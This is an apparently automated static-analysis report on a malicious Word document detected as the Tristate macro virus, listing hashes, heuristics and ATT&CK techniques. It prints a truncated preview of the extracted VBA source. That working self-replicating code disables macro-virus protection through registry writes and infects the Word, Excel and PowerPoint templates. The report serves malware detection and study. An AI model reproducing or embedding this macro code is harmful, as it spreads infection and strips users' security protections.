Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca02f620e4d2041c…

MALICIOUS

Office (OLE)

44.0 KB Created: 2319-07-25 23:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9f7d1933a6c77686c6aff92f4b2fc1a7 SHA-1: ca37140b9fdc65ac30bde3d8444c60a8c5586469 SHA-256: ca02f620e4d2041cb523d6f80a890befbcfa9e77a61f19c04d28e10bd246a922
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Workbook_Open event, which is a common technique for executing malicious code upon document opening. The script uses CreateObject and GetObject calls, indicative of attempting to interact with other applications or system components to download and execute a payload. The ClamAV detections 'Win.Trojan.Tristate-2' and 'Doc.Trojan.Tristate-1' further confirm its malicious nature. The script also attempts to modify registry keys related to Excel's startup behavior, likely to establish persistence or influence its execution.

Heuristics 6

  • ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Tristate-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9480 bytes
SHA-256: 95ea0b78979f68d556eb0ae593b77dc8d7656dcd6eb1ea019c5c433e0a1922a9
Detection
ClamAV: Doc.Trojan.Tristate-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
        ad.DeleteLines 1, ad.CountofLines
        ad.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
            ad.InsertLines 1, nt.Lines(, nt.CountofLines)
        End If
    End If
    If nt.Lines(1, 1) <> "'<!--1nternal-->" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add
            Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Triplicate" Then dontadd = True
        Next
        If dontadd <> True Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            Set NewMod = PBT.VBProject.VBComponents.Add(1)
            NewMod.Name = "Triplicate"
            NewMod.CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
            NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
            Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "Triplicate"
                .ZOrder (1)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(1).Action = 8
                .ActionSettings(1).Run = "actionhook"
            End With
            Set NewMod = Nothing
            PBT.Save
        End If
        PBT.Close
        PPObj.Quit
    End If
    If TT.Lines(1, 1) <> "'<!--1nternal-->" Then
        TT.DeleteLines 1, TT.CountofLines
        TT.InsertLines 1, nt.Lines(1, nt.CountofLines)
    End If
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
        Set WordObj = GetObject(, "
... (truncated)